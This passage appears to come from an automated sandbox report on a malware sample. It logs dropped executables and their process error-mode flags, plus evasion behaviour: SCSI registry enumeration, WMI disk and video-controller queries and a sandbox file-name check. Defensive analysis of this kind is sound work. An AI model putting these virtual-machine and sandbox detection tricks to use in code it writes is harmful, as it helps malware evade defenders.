Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6ED0.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6ED0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eieeggj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eieeggj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eieeggj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eieeggj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eieeggj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eieeggj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\28CC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\16E6.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
